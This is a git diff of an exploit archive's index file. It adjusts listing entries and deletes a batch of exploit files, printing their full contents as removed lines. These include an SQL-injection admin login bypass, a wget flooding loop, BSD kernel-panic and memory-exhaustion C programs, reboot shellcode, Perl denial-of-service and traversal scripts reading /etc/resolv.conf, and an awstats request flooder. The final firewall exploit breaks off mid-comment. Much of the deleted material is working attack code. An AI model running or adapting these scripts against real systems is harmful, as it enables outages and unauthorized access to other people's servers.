36839,platforms/multiple/remote/36839.py,"MiniUPnPd 1.0 - Stack Overflow RCE for AirTies RT Series (MIPS)",2015-04-27,"Onur Alanbel (BGA)",multiple,remote,0 -36840,platforms/multiple/dos/36840.py,"Wireshark <=1.12.4 - Memory Corruption and Access Violation PoC",2015-04-27,"Avinash Thapa",multiple,dos,0 +36840,platforms/multiple/dos/36840.py,"Wireshark <= 1.12.4 - Memory Corruption and Access Violation PoC",2015-04-27,"Avinash Thapa",multiple,dos,0 36841,platforms/windows/local/36841.py,"UniPDF 1.2 - 'xml' Buffer Overflow Crash PoC",2015-04-27,"Avinash Thapa",windows,local,0 36842,platforms/php/webapps/36842.pl,"OTRS < 3.1.x & < 3.2.x & < 3.3.x - Stored Cross-Site Scripting (XSS)",2015-04-27,"Adam Ziaja",php,webapps,0 36994,platforms/cgi/webapps/36994.txt,"WebGlimpse 2.18.7 'DOC' Parameter Directory Traversal Vulnerability",2009-04-17,MustLive,cgi,webapps,0 @@ -33487,7 +33487,7 @@ id,file,description,date,author,platform,type,port 37097,platforms/ios/remote/37097.py,"FTP Media Server 3.0 - Authentication Bypass and Denial of Service",2015-05-25,"Wh1t3Rh1n0 (Michael Allen)",ios,remote,0 37098,platforms/windows/local/37098.txt,"Microsoft Windows - Local Privilege Escalation (MS15-010)",2015-05-25,"Sky lake",windows,local,0 37253,platforms/php/webapps/37253.txt,"Paypal Currency Converter Basic For Woocommerce File Read",2015-06-10,Kuroi'SH,php,webapps,0 -37254,platforms/php/webapps/37254.txt,"Wordpress History Collection <=1.1.1 Arbitrary File Download",2015-06-10,Kuroi'SH,php,webapps,80 +37254,platforms/php/webapps/37254.txt,"Wordpress History Collection <= 1.1.1 - Arbitrary File Download",2015-06-10,Kuroi'SH,php,webapps,80 37255,platforms/php/webapps/37255.txt,"Pandora FMS 5.0_ 5.1 - Authentication Bypass",2015-06-10,"Manuel Mancera",php,webapps,0 37100,platforms/php/webapps/37100.txt,"Waylu CMS 'products_xx.php' SQL Injection and HTML Injection Vulnerabilities",2012-04-20,TheCyberNuxbie,php,webapps,0 37101,platforms/php/webapps/37101.txt,"Joomla CCNewsLetter Module 1.0.7 'id' Parameter SQL Injection Vulnerability",2012-04-23,E1nzte1N,php,webapps,0 @@ -33599,14 +33599,14 @@ id,file,description,date,author,platform,type,port 37252,platforms/php/webapps/37252.txt,"Wordpress RobotCPA Plugin V5 - Local File Inclusion",2015-06-10,T3N38R15,php,webapps,80 37216,platforms/php/webapps/37216.txt,"Unijimpe Captcha 'captchademo.php' Cross Site Scripting Vulnerability",2012-05-16,"Daniel Godoy",php,webapps,0 37217,platforms/php/webapps/37217.txt,"Artiphp 5.5.0 Neo 'index.php' Multiple Cross Site Scripting Vulnerabilities",2012-05-17,"Gjoko Krstic",php,webapps,0 -37218,platforms/jsp/webapps/37218.txt,"Atlassian Tempo 6.4.3_ JIRA 5.0 0_ Gliffy 3.7.0 XML Parsing Denial of Service Vulnerability",2012-05-17,anonymous,jsp,webapps,0 +37218,platforms/jsp/dos/37218.txt,"Atlassian Tempo 6.4.3_ JIRA 5.0 0_ Gliffy 3.7.0 - XML Parsing Denial of Service Vulnerability",2012-05-17,anonymous,jsp,dos,0 37219,platforms/php/webapps/37219.txt,"PHP Address Book 7.0 Multiple Cross Site Scripting Vulnerabilities",2012-05-17,"Stefan Schurtz",php,webapps,0 37220,platforms/jsp/webapps/37220.txt,"OpenKM 5.1.7 Cross Site Request Forgery Vulnerability",2012-05-03,"Cyrill Brunschwiler",jsp,webapps,0 37221,platforms/jsp/webapps/37221.txt,"Atlassian JIRA FishEye <= 2.5.7 and Crucible <= 2.5.7 Plugins XML Parsing Unspecified Security Vulnerability",2012-05-17,anonymous,jsp,webapps,0 37222,platforms/asp/webapps/37222.txt,"Acuity CMS 2.6.2 /admin/file_manager/file_upload_submit.asp Multiple Parameter File Upload ASP Code Execution",2012-05-21,"Aung Khant",asp,webapps,0 37223,platforms/asp/webapps/37223.txt,"Acuity CMS 2.6.2 /admin/file_manager/browse.asp path Parameter Traversal Arbitrary File Access",2012-05-21,"Aung Khant",asp,webapps,0 37224,platforms/php/webapps/37224.txt,"Yandex.Server 2010 9.0 - 'text' Parameter Cross Site Scripting Vulnerability",2012-05-21,MustLive,php,webapps,0 -37225,platforms/php/webapps/37225.pl,"concrete5 concrete/js/tiny_mce/plugins/spellchecker/rpc.php Remote DoS",2012-05-20,AkaStep,php,webapps,0 +37225,platforms/php/webapps/37225.pl,"Concrete CMS < 5.5.21 - Multiple Security Vulnerabilities",2012-05-20,AkaStep,php,webapps,0 37226,platforms/php/webapps/37226.txt,"concrete5 FlashUploader Arbitrary SWF File Upload",2012-05-20,AkaStep,php,webapps,0 37227,platforms/php/webapps/37227.txt,"concrete5 index.php/tools/required/files/replace searchInstance Parameter XSS",2012-05-20,AkaStep,php,webapps,0 37228,platforms/php/webapps/37228.txt,"concrete5 index.php/tools/required/files/add_to searchInstance Parameter XSS",2012-05-20,AkaStep,php,webapps,0 @@ -33710,7 +33710,7 @@ id,file,description,date,author,platform,type,port 37342,platforms/php/webapps/37342.txt,"TinyCMS 1.3 admin/admin.php do Parameter Traversal Local File Inclusion",2012-06-03,KedAns-Dz,php,webapps,0 37343,platforms/windows/dos/37343.py,"Seagate Dashboard 4.0.21.0 - Crash PoC",2015-06-23,HexTitan,windows,dos,0 37344,platforms/windows/local/37344.py,"KMPlayer 3.9.1.136 - Capture Unicode Buffer Overflow (ASLR Bypass)",2015-06-23,"Naser Farhadi",windows,local,0 -37440,platforms/php/webapps/37440.txt,"Watchguard XCS <=10.0 - Multiple Vulnerabilities",2015-06-30,Security-Assessment.com,php,webapps,0 +37440,platforms/php/webapps/37440.txt,"Watchguard XCS <= 10.0 - Multiple Vulnerabilities",2015-06-30,Security-Assessment.com,php,webapps,0 37360,platforms/php/webapps/37360.txt,"GeniXCMS 0.0.3 - XSS Vulnerabilities",2015-06-24,"John Page",php,webapps,80 37346,platforms/windows/dos/37346.txt,"Paintshop Pro X7 GIF Conversion Heap Memory Corruption Vulnerabilities (LZWMinimumCodeSize)",2015-06-23,"Francis Provencher",windows,dos,0 37347,platforms/windows/dos/37347.txt,"Photoshop CC2014 and Bridge CC 2014 Gif Parsing Memory Corruption Vulnerabilities",2015-06-23,"Francis Provencher",windows,dos,0 @@ -34005,7 +34005,7 @@ id,file,description,date,author,platform,type,port 37670,platforms/osx/local/37670.sh,"OS X 10.10 DYLD_PRINT_TO_FILE Local Privilege Escalation",2015-07-22,"Stefan Esser",osx,local,0 37671,platforms/multiple/remote/37671.txt,"Websense Content Gateway Multiple Cross Site Scripting Vulnerabilities",2012-08-23,"Steven Sim Kok Leong",multiple,remote,0 37672,platforms/php/webapps/37672.txt,"JW Player 'logo.link' Parameter Cross Site Scripting Vulnerability",2012-08-29,MustLive,php,webapps,0 -37673,platforms/windows/remote/37673.html,"Microsoft Indexing Service 'ixsso.dll' ActiveX Control Denial of Service Vulnerability",2012-08-24,coolkaveh,windows,remote,0 +37673,platforms/windows/dos/37673.html,"Microsoft Indexing Service - 'ixsso.dll' ActiveX Control Denial of Service Vulnerability",2012-08-24,coolkaveh,windows,dos,0 37674,platforms/php/webapps/37674.txt,"PHP Web Scripts Text Exchange Pro 'page' Parameter Local File Include Vulnerability",2012-08-24,"Yakir Wizman",php,webapps,0 37675,platforms/php/webapps/37675.txt,"Joomla! Komento Component 'cid' Parameter SQL Injection Vulnerability",2012-08-27,Crim3R,php,webapps,0 37676,platforms/asp/webapps/37676.txt,"Power-eCommerce Multiple Cross Site Scripting Vulnerabilities",2012-08-25,Crim3R,asp,webapps,0 @@ -34017,7 +34017,7 @@ id,file,description,date,author,platform,type,port 37682,platforms/php/webapps/37682.txt,"WordPress Simple:Press Forum Plugin Arbitrary File Upload Vulnerability",2012-08-28,"Iranian Dark Coders",php,webapps,0 37683,platforms/php/webapps/37683.txt,"Phorum 5.2.18 Multiple Cross Site Scripting Vulnerabilities",2012-08-29,"High-Tech Bridge",php,webapps,0 37684,platforms/php/webapps/37684.html,"PrestaShop <= 1.4.7 Multiple Cross Site Scripting Vulnerabilities",2012-08-29,"High-Tech Bridge",php,webapps,0 -37685,platforms/xml/webapps/37685.txt,"squidGuard 1.4 Long URL Handling Remote Denial of Service Vulnerability",2012-08-30,"Stefan Bauer",xml,webapps,0 +37685,platforms/xml/dos/37685.txt,"squidGuard 1.4 - Long URL Handling Remote Denial of Service Vulnerability",2012-08-30,"Stefan Bauer",xml,dos,0 37686,platforms/multiple/webapps/37686.txt,"Hawkeye-G v3.0.1.4912 CSRF Vulnerability",2015-07-24,"John Page",multiple,webapps,0 37687,platforms/php/webapps/37687.txt,"TomatoCart 'example_form.ajax.php' Cross Site Scripting Vulnerability",2012-08-30,HauntIT,php,webapps,0 37689,platforms/asp/webapps/37689.txt,"XM Forum 'search.asp' SQL Injection Vulnerability",2012-08-30,Crim3R,asp,webapps,0 @@ -34040,7 +34040,7 @@ id,file,description,date,author,platform,type,port 37707,platforms/php/webapps/37707.txt,"WordPress Count Per Day Plugin 3.4 - SQL Injection",2015-07-27,"High-Tech Bridge SA",php,webapps,80 37708,platforms/php/webapps/37708.txt,"Xceedium Xsuite - Multiple Vulnerabilities",2015-07-27,modzero,php,webapps,0 37709,platforms/php/webapps/37709.txt,"phpFileManager 0.9.8 - Remote Command Execution Vulnerability",2015-07-28,"John Page",php,webapps,0 -37710,platforms/linux/local/37710.txt,"Sudo <=1.8.14 - Unauthorized Privilege",2015-07-28,"daniel svartman",linux,local,0 +37710,platforms/linux/local/37710.txt,"Sudo <= 1.8.14 - Unauthorized Privilege",2015-07-28,"daniel svartman",linux,local,0 37711,platforms/windows/dos/37711.py,"Classic FTP 2.36 - CWD Reconnection DoS",2015-07-28,St0rn,windows,dos,0 37712,platforms/php/webapps/37712.txt,"phpFileManager 0.9.8 - CSRF Vulnerability",2015-07-29,"John Page",php,webapps,80 37713,platforms/php/webapps/37713.txt,"2Moons - Multiple Vulnerabilities",2015-07-29,bRpsd,php,webapps,80 @@ -34074,3 +34074,4 @@ id,file,description,date,author,platform,type,port 37749,platforms/lin_x86/shellcode/37749.c,"Linux x86 Egg Hunter Shellcode (19 bytes)",2015-08-10,"Guillaume Kaddouch",lin_x86,shellcode,0 37750,platforms/php/webapps/37750.txt,"WDS CMS - SQL Injection",2015-08-10,"Ismail Marzouk",php,webapps,80 37754,platforms/php/webapps/37754.txt,"WordPress Candidate Application Form Plugin 1.0 - Arbitrary File Download",2015-08-10,"Larry W. Cashdollar",php,webapps,80 +37764,platforms/windows/dos/37764.html,"Internet Explorer CTreeNode::GetCascadedLang Use-After-Free Vulnerability (MS15-079)",2015-08-12,"Blue Frost Security GmbH",windows,dos,0 diff --git a/platforms/asp/webapps/12527.txt b/platforms/asp/webapps/12527.txt deleted file mode 100755 index 3b1d4e7bc..000000000 --- a/platforms/asp/webapps/12527.txt +++ /dev/null @@ -1,49 +0,0 @@ -************************************************************ - -** Administrador de Contenidos Admin Login Bypass vulnerability - -************************************************************ - -** Prodcut: Administrador de Contenidos - -** Home : www.DZ4All.cOm/Cc - -** Vunlerability : Admin Bypass - -** Risk : High - -** Dork : "Diseño Web Hernest Consulting S.L." - -************************************************************ - -** Discovred by: Ra3cH - -** From : Algeria - -** Contact : e51@hotmail.fr - -** ********************************************************* - -** Greetz to : ALLAH - -** All Members of http://www.DZ4All.cOm/Cc - -** And My BrOther AnGeL25dZ & yasMouh & ProToCoL & Mr.Benladen - -************************************************************ - -** Exploit: - -** http://[PATH]/admin or http://[PATH]/admin/Login.Asp - -** - -** user : ' or '1=1 - -** password : ' or '1=1 - -** - -************************************************************ - -************************************************************ \ No newline at end of file diff --git a/platforms/asp/webapps/27258.txt b/platforms/asp/webapps/27258.txt deleted file mode 100755 index 2a2bd2483..000000000 --- a/platforms/asp/webapps/27258.txt +++ /dev/null @@ -1,17 +0,0 @@ -source: http://www.securityfocus.com/bid/16771/info - -Ipswitch WhatsUp Professional 2006 is susceptible to a remote denial-of-service vulnerability. This issue is due to the application's failure to properly handle certain HTTP GET requests. - -This issue allows remote attackers to consume excessive CPU resources on targeted computers, denying service to legitimate users. - -http://www.example.com:81/NmConsole/Login.asp?bIsJavaScriptDisabled=true&sLoginPassword=&btnLogIn=[Log&In]=&sLoginUserName= -http://www.example.com:81/NmConsole/Login.asp?bIsJavaScriptDisabled=true&sLoginUserName=&btnLogIn=[Log&In]=&sLoginPassword= -http://www.example.com:81/NmConsole/Login.asp?bIsJavaScriptDisabled=true&sLoginUserName=&sLoginPassword=&In]=&btnLogIn= -http://www.example.com:81/NmConsole/Login.asp?bIsJavaScriptDisabled=true&sLoginUserName=&sLoginPassword=&btnLogIn=[Log&In]= - -An example script to exploit this issue is also available: - -while [ 1 ] -do -wget -O /dev/null http://www.example.com:81/NmConsole/Login.asp?bIsJavaScriptDisabled=true&sLoginPassword=&b;tnLogIn=[Log&In]=&sLoginUserName= -done \ No newline at end of file diff --git a/platforms/asp/webapps/35154.txt b/platforms/asp/webapps/35154.txt deleted file mode 100755 index c1a1cd77b..000000000 --- a/platforms/asp/webapps/35154.txt +++ /dev/null @@ -1,7 +0,0 @@ -source: http://www.securityfocus.com/bid/45588/info - -Sigma Portal is prone to a denial-of-service vulnerability. - -Attackers can exploit this issue to cause the server to consume excessive resources, denying service to legitimate users. - -http://www.example.com/Portal/Picture/ShowObjectPicture.aspx?Width=%27910000&Height=1099000-=&ObjectType=News&ObjectID=(Picture ID) \ No newline at end of file diff --git a/platforms/bsd/local/19488.c b/platforms/bsd/local/19488.c deleted file mode 100755 index ab82d4724..000000000 --- a/platforms/bsd/local/19488.c +++ /dev/null @@ -1,38 +0,0 @@ -source: http://www.securityfocus.com/bid/622/info - -A denial of service attack exists that affects FreeBSD, NetBSD and OpenBSD, and potentially other operating systems based in some part on BSD. It is believed that all versions of these operating systems are vulnerable. The vulnerability is related to setting socket options regarding the size of the send and receive buffers on a socketpair. By setting them to certain values, and performing a write the size of the value the options have been set to, FreeBSD can be made to panic. NetBSD and OpenBSD do not panic, but network applications will stop responding. - -Details behind why this happens have not been made available. - -#include -#include -#include - -#define BUFFERSIZE 204800 - -extern int -main(void) -{ -int p[2], i; -char crap[BUFFERSIZE]; - -while (1) -{ -if (socketpair(AF_UNIX, SOCK_STREAM, 0, p) == -1) -break; -i = BUFFERSIZE; -setsockopt(p[0], SOL_SOCKET, SO_RCVBUF, &i, sizeof(int)); -setsockopt(p[0], SOL_SOCKET, SO_SNDBUF, &i, sizeof(int)); -setsockopt(p[1], SOL_SOCKET, SO_RCVBUF, &i, sizeof(int)); -setsockopt(p[1], SOL_SOCKET, SO_SNDBUF, &i, sizeof(int)); -fcntl(p[0], F_SETFL, O_NONBLOCK); -fcntl(p[1], F_SETFL, O_NONBLOCK); -write(p[0], crap, BUFFERSIZE); -write(p[1], crap, BUFFERSIZE); -} -exit(0); -} - - - - \ No newline at end of file diff --git a/platforms/bsd/local/21077.c b/platforms/bsd/local/21077.c deleted file mode 100755 index 583358999..000000000 --- a/platforms/bsd/local/21077.c +++ /dev/null @@ -1,31 +0,0 @@ -source: http://www.securityfocus.com/bid/3220/info - -It has been reported that there is a locally exploitable vulnerability in BSDI. - -It is allegedly possible for a userland process to cause the kernel to halt. - -This may be due to a bad system call. - -/* (BSDi)*[v3.0/3.1] system failure, by - v9[v9@realhalo.org]. this will result - in the ability of any user to fail the - system, and reboot it. this bug is - similar to that of the "f00f" bug. - results are similar, except this reboots - the machine instead of having a freezing - effect. tested, and built for: BSDi - v3.0/3.1. (arch/non-specific to BSDi) -*/ -char bsdi_killcode[] = - "\xb8\x8f\xf8\xff\x0b\xf7\xd0\x50\xb0\x0b" - "\xb0\x9a\x50\x89\xe7\xff\xd7"; -int main() { - void (*execcode)()=(void *)bsdi_killcode; - printf("[ (BSDi)*[v3.0/3.1]: system failu" - "re, by: v9[v9@realhalo.org]. ]\n"); - printf("*** no output should be seen afte" - "r this point.\n"); - execcode(); - printf("*** system failure failed.\n"); - exit(0); -} diff --git a/platforms/cgi/remote/20400.txt b/platforms/cgi/remote/20400.txt deleted file mode 100755 index 68dad4a40..000000000 --- a/platforms/cgi/remote/20400.txt +++ /dev/null @@ -1,8 +0,0 @@ -source : http://www.securityfocus.com/bid/1934/info - -Cart32 is a shopping cart application for e-commerce enabled sites. - -Cart32 is subject to a denial of service. When requesting a specially formed URL the application will cause the CPU utilization to spike to 100%. A restart of the application is required in order to gain normal functionality. - - -http://target/cgi-bin/c32web.exe/ShowProgress \ No newline at end of file diff --git a/platforms/cgi/remote/20753.txt b/platforms/cgi/remote/20753.txt deleted file mode 100755 index da9211295..000000000 --- a/platforms/cgi/remote/20753.txt +++ /dev/null @@ -1,9 +0,0 @@ -source: http://www.securityfocus.com/bid/2588/info - -Net.Commerce is part of the Websphere platform of products distributed by IBM. Net.Commerce provides several versatile features to facilitate e-commerce, and features in performance and reliability. - -A problem in the Net.Commerce package could allow a remote user to deny service to legitimate users of the service hosted by the Websphere server. This is due to the handling of long strings by the macro.d2w cgi included with a Net.Commerce installation. By supplying a long string of "%0a" characters to the CGI, the Websphere server ceases operation. - -A remote user may use this vulnerability to crash the Websphere server, thus denying service to legitimate users. - -http://host/cgi-bin/ncommerce3/ExecMacro/macro.d2w/%0a%0a..(aprox 1000)..%0a \ No newline at end of file diff --git a/platforms/cgi/webapps/1157.pl b/platforms/cgi/webapps/1157.pl deleted file mode 100755 index d2a11074c..000000000 --- a/platforms/cgi/webapps/1157.pl +++ /dev/null @@ -1,54 +0,0 @@ -#!/usr/bin/perl - - use LWP::Simple; - - if (@ARGV < 3) -{ - print "\nUsage: $0 [server] [path] [mode] [count for DoS]\n"; - print "sever - URL chat\n"; - print "path - path to chat.pl\n"; - print "mode - poc or dos,\n"; - print " poc - simple check without DoS and exit,\n"; - print " dos - DoS, you must set count for requests in 4 argument.\n\n"; - exit (); -} - $DoS = "dos"; - $POC = "poc"; - $server = $ARGV[0]; - $path = $ARGV[1]; - $mode = $ARGV[2]; - $count = $ARGV[3]; - print qq( - ################################### - # GTChat <= 0.95 Alpha remote DoS # - # tested on GTChat 0.95 Alpha # - # (c)oded by x97Rang 2005 RST/GHC # - # Respect: b1f, 1dt.w0lf, ed # - ################################### ); - if ($mode eq $POC) -{ - print "\n\nTry read file /etc/resolv.conf, maybe remote system unix...\n"; - $URL = sprintf("http://%s%s/chat.pl?language=../../../../../../../../../../etc/resolv.conf%00 HTTP/1.0\nHost: %s\nAccept:*/*\nConnection:close\n\n",$server,$path,$server); - $content = get "$URL"; - if ($content =~ /(domain|sortlist|options|search|nameserver|dhclient)/) -{ print "File read successfully, remote system is *nix and $server are VULNERABLE!\n"; exit(); } - if ($content =~ /Fatal error/) -{ - print "File read failed, but *Fatal error* returned, $server MAYBE vulnerable, check all output:\n"; - print "=== OUTPUT ===============================================================================\n"; - print "\n$content\n"; - print "=============================================================================== OUTPUT ===\n"; - exit(); -} - else { print "Hmm.. if you arguments right, then $server NOT vulnerable, go sleep :)\n"; } -} - if ($mode eq $DoS) -{ - if (!($count)) { print "\nNeed count for DoS requests, you don't set it, exit...\n"; exit() } - print "\nSend $count DoS requests to $server...\n"; - $URL = sprintf("http://%s%schat.pl?language=chat.pl%00 HTTP/1.0\nHost: %s\nAccept:*/*\nConnection:close\n\n",$server,$path,$server); - for ($count_ov = 0; $count_ov != $count; $count_ov++) { $content = get "$URL"; } - print "Done, packets sended.\n"; -} - -# milw0rm.com [2005-08-18] diff --git a/platforms/cgi/webapps/1175.pl b/platforms/cgi/webapps/1175.pl deleted file mode 100755 index e717be7a6..000000000 --- a/platforms/cgi/webapps/1175.pl +++ /dev/null @@ -1,46 +0,0 @@ -# Use a high user # for best results. /str0ke - -#!/usr/bin/perl -###################### -# codez0red by VTECin5th # -# Feel free to modify/break this script # -# Crappy code is more effective =] # -# I accept no responsibility for misuse or abuse # -###################### -# Usage: xxx.pl www.server.com /directory_to_chat/ #_of_users_to_create -###################### -# Affected Software: GTChat .95 -# Unaffected Software: GTChat .93 -###################### -use IO::Socket; -if (@ARGV < 2){ -print "Usage:\n xxx.pl www.server.com /Path_to_GTChat/ #_of_users_to_create\n"; -print "Example:\n xxx.pl www.serfer.com /GTChat/cgi-bin/ 5"; -exit; -} -$dir = $ARGV[1]; -$numero = $ARGV[2]; -$host = $ARGV[0]; -$host =~ s/http\:\/\///gi; -for ($i = 1; $i <= $numero; $i++) { -$rando = int(rand(234)); -$randy = int(rand(12)); -$whyThem = $randy . $rando . "@" . $randy . ".com"; -$whyMe = "SoSorry" . $rando . $randy; -$lol = "$dir/chat.pl?action=register&name=$whyMe&password=$whyMe&password2=$whyMe&email=$whyThem&privateemail=0"; -$ox=IO::Socket::INET->new(PeerAddr=>$host,PeerPort=>80,Proto=>'tcp') || die "Oh No! You broke teh server!"; -print $ox "GET $lol HTTP/1.1\r\n"; -print $ox "Accept: */*\r\n"; -print $ox "Accept-Language: pt\r\n"; -print $ox "Accept-Encoding: gzip, deflate\r\n"; -print $ox "User-Agent: 1337 pwnz0r\r\n"; -print $ox "Host: $host\r\n"; -print $ox "Connection: Keep-Alive\r\n\r\n\r\n"; -print "currently on: $whyMe \t ($i)\n"; -# Please note, this does not verify whether or not the user is actually being created. -# I assume you know how to use this script. -} -print "Finished creating $numero users"; -close($ox); - -# milw0rm.com [2005-08-23] diff --git a/platforms/cgi/webapps/24619.txt b/platforms/cgi/webapps/24619.txt deleted file mode 100755 index 74c84b7b1..000000000 --- a/platforms/cgi/webapps/24619.txt +++ /dev/null @@ -1,9 +0,0 @@ -source: http://www.securityfocus.com/bid/11226/info - -Reportedly EmuLive Server4 is affected by an authentication bypass vulnerability and a denial of service vulnerability. These issues are due to an access validation issue and a failure to handle exceptional conditions. - -An attacker may leverage the authentication bypass issue to gain unauthorized access to the administrator scripts of the affected application, facilitating manipulation of various server settings. The denial of service issue may be exploited to cause the affected computer to freeze, denying service to legitimate users. - -http://www.example.com//PUBLIC/ADMIN/INDEX.HTM - -Note that the '//' after the 'http://www.example.com' is where a session ID would be presented, by providing no data between these slashes a NULL session ID is used to authenticate the attacker. \ No newline at end of file diff --git a/platforms/cgi/webapps/3223.pl b/platforms/cgi/webapps/3223.pl deleted file mode 100755 index 08085080f..000000000 --- a/platforms/cgi/webapps/3223.pl +++ /dev/null @@ -1,65 +0,0 @@ -## -## cvstrack-resurrect.pl -- CVSTrac Post-Attack Database Resurrection -## Copyright (c) 2007 Ralf S. Engelschall -## - -use DBI; # requires OpenPKG perl-dbi -use DBD::SQLite; # requires OpenPKG perl-dbi, perl-dbi::with_dbd_sqlite=yes -use DBIx::Simple; # requires OpenPKG perl-dbix -use Date::Format; # requires OpenPKG perl-time - -my $db_file = $ARGV[0]; - -my $db = DBIx::Simple->connect( - "dbi:SQLite:dbname=$db_file", "", "", - { RaiseError => 0, AutoCommit => 0 } -); - -my $eow = q{\x00\s.,:;?!)"'}; - -sub fixup { - my ($data) = @_; - if ($$data =~ m:/[^$eow]*/[^$eow]*'[^$eow]+:s) { - $$data =~ s:(/[^$eow]*/[^$eow]*)('[^$eow]+):$1 $2:sg; - return 1; - } - return 0; -} - -foreach my $rec ($db->query("SELECT name, invtime, text FROM wiki")->hashes()) { - if (&fixup(\$rec->{"text"})) { - printf("++ adjusting Wiki page \"%s\" as of %s\n", - $rec->{"name"}, time2str("%Y-%m-%d %H:%M:%S", -$rec->{"invtime"})); - $db->query("UPDATE wiki SET text = ? WHERE name = ? AND invtime = ?", - $rec->{"text"}, $rec->{"name"}, $rec->{"invtime"}); - } -} -foreach my $rec ($db->query("SELECT tn, description, remarks FROM ticket")->hashes()) { - if (&fixup(\$rec->{"description"}) or &fixup(\$rec->{"remarks"})) { - printf("++ adjusting ticket #%d\n", - $rec->{"tn"}); - $db->query("UPDATE ticket SET description = ?, remarks = ? WHERE tn = ?", - $rec->{"description"}, $rec->{"remarks"}, $rec->{"tn"}); - } -} -foreach my $rec ($db->query("SELECT tn, chngtime, oldval, newval FROM tktchng")->hashes()) { - if (&fixup(\$rec->{"oldval"}) or &fixup(\$rec->{"newval"})) { - printf("++ adjusting ticket [%d] change as of %s\n", - $rec->{"tn"}, time2str("%Y-%m-%d %H:%M:%S", $rec->{"chngtime"})); - $db->query("UPDATE tktchng SET oldval = ?, newval = ? WHERE tn = ? AND chngtime = ?", - $rec->{"oldval"}, $rec->{"newval"}, $rec->{"tn"}, $rec->{"chngtime"}); - } -} -foreach my $rec ($db->query("SELECT cn, message FROM chng")->hashes()) { - if (&fixup(\$rec->{"message"})) { - printf("++ adjusting change [%d]\n", - $rec->{"cn"}); - $db->query("UPDATE chng SET message = ? WHERE cn = ?", - $rec->{"message"}, $rec->{"cn"}); - } -} - -$db->commit(); -$db->disconnect(); - -# milw0rm.com [2007-01-29] diff --git a/platforms/cgi/webapps/817.pl b/platforms/cgi/webapps/817.pl deleted file mode 100755 index b8e34a6fe..000000000 --- a/platforms/cgi/webapps/817.pl +++ /dev/null @@ -1,44 +0,0 @@ -#!/usr/bin/perl -# -# -# Summarized the advisory www.ghc.ru GHC: /str0ke -# -# [0] Exploitable example (raw log plugin): -# Attacker can read sensitive information -# -# http://server/cgi-bin/awstats-6.4/awstats.pl?pluginmode=rawlog&loadplugin=rawlog -# -# [1] Perl code execution. (This script) -# -# http://server/cgi-bin/awstats-6.4/awstats.pl?&PluginMode=:print+getpwent -# -# [2] Arbitrary plugin including. -# -# http://server/cgi-bin/awstats-6.4/awstats.pl?&loadplugin=../../../../usr/libdata/perl/5.00503/blib -# -# [3] Sensetive information leak in AWStats version 6.3(Stable) - 6.4(Development). -# Every user can access debug function: -# -# http://server/cgi-bin/awstats-6.4/awstats.pl?debug=1 -# http://server/cgi-bin/awstats-6.4/awstats.pl?debug=2 -# -# Be sure to change the $server + /cgi-bin location /str0ke -# - -use IO::Socket; -$server = 'www.example.com'; -sub ConnectServer { -$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => "80") -|| die "Error\n"; -print $socket "GET /cgi-bin/awstats-6.4/awstats.pl?&hack=$rp&PluginMode=:sleep HTTP/1.1\n"; -print $socket "Host: $server\n"; -print $socket "Accept: */*\n"; -print $socket "\n\n"; -} - -while () { -$rp = rand; -&ConnectServer; -} - -# milw0rm.com [2005-02-14] diff --git a/platforms/freebsd/local/19505.c b/platforms/freebsd/local/19505.c deleted file mode 100755 index 8e469805e..000000000 --- a/platforms/freebsd/local/19505.c +++ /dev/null @@ -1,58 +0,0 @@ -source: http://www.securityfocus.com/bid/653/info - -A vulnerability exists in FreeBSD's new VFS cache introduced in version 3.0 that allows a local and possibly remote user to force the kernel to consume large quantities of wired memory thus creating a denial of service condition. The new VFS cache has no way to purge entries from memory while the file is open, consuming wired memory and allowing for the denial of service (memory that cannot be swapped out). - -FreeBSD versions earlier than 3.0 are not vulnerable, nor is the original 4.4BSD-Lite code. - -#include -#include -#include - -#define NFILE 64 -#define NLINK 30000 -#define NCHAR 245 - -int -main() -{ - char junk[NCHAR+1], - dir[2+1+2+1], file1[2+1+2+1+NCHAR+3+1], file2[2+1+2+1+NCHAR+3+1]; - int i, j; - struct stat sb; - - memset(junk, 'x', NCHAR); - junk[NCHAR] = '\0'; - for (i = 0; i < NFILE; i++) { - printf("\r%02d/%05d...", i, 0), - fflush(stdout); - sprintf(dir, "%02d-%02d", i, 0); - if (mkdir(dir, 0755) < 0) - fprintf(stderr, "mkdir(%s) failed\n", dir), - exit(1); - sprintf(file1, "%s/%s%03d", dir, junk, 0); - if (creat(file1, 0644) < 0) - fprintf(stderr, "creat(%s) failed\n", file1), - exit(1); - if (stat(file1, &sb) < 0) - fprintf(stderr, "stat(%s) failed\n", file1), - exit(1); - for (j = 1; j < NLINK; j++) { - if ((j % 1000) == 0) { - printf("\r%02d/%05d...", i, j), - fflush(stdout); - sprintf(dir, "%02d-%02d", i, j/1000); - if (mkdir(dir, 0755) < 0) - fprintf(stderr, "mkdir(%s) failed\n", dir), - exit(1); - } - sprintf(file2, "%s/%s%03d", dir, junk, j%1000); - if (link(file1, file2) < 0) - fprintf(stderr, "link(%s,%s) failed\n", file1, file2), - exit(1); - if (stat(file2, &sb) < 0) - fprintf(stderr, "stat(%s) failed\n", file2), - exit(1); - } - } - printf("\rfinished successfully\n"); -} diff --git a/platforms/hardware/remote/19441.c b/platforms/hardware/remote/19441.c deleted file mode 100755 index 0be3cd3c7..000000000 --- a/platforms/hardware/remote/19441.c +++ /dev/null @@ -1,245 +0,0 @@ -source: http://www.securityfocus.com/bid/556/info - -There is a vulnerability in Gauntlet Firewall 5.0 which allows an attacker to remotely cause a denial of service. The vulnerability occurs because Gauntlet Firewall cannot handle a condition where an ICMP Protocol Problem packet's (ICMP_PARAMPROB) encapsulated IP packet has a random protocol field and certain IP options set. When this specially constructed packet ( [ICMP PARAMPROB][IP with random protocol code and some ip options] ) is sent THROUGH the Gauntlet Firewall (not to the firewall itself), the firewall will hang, looking for the packet in it's transparency tables. - -The packet structure looks like this: - -Begin Packet ------------------------------------------- -[NORMAL IP HEADER] - -[ICMP PARAMPROB HEADER] - --- encapsulated ip packet -- - -[IP HEADER] - -(important fields in ip header) - -ip_p = 98 (let's specify a protocol that doesn't exist) -ip_hl = 0xf (stuff options) - - ------------------------------------------- -End Packet - -An attacker would do the following: - -Construct the [ip-icmp-ip] packet using a raw socket (SOCK_RAW) with the fields set accordingly, destination set to any machine behind the firewall. - -Send the packet(s). - -The number of packets that need to be sent depends on the platform (ie Sol on a Sparc vs BSDI). - -The consequence of this vulnerability being exploited is the target Gauntlet 5.0 firewall being remotely locked up. It should be expected that an attacker would send packets with spoofed source addresses in the ip header making it difficult to trace. - -/* - * Discovered and written by: <- 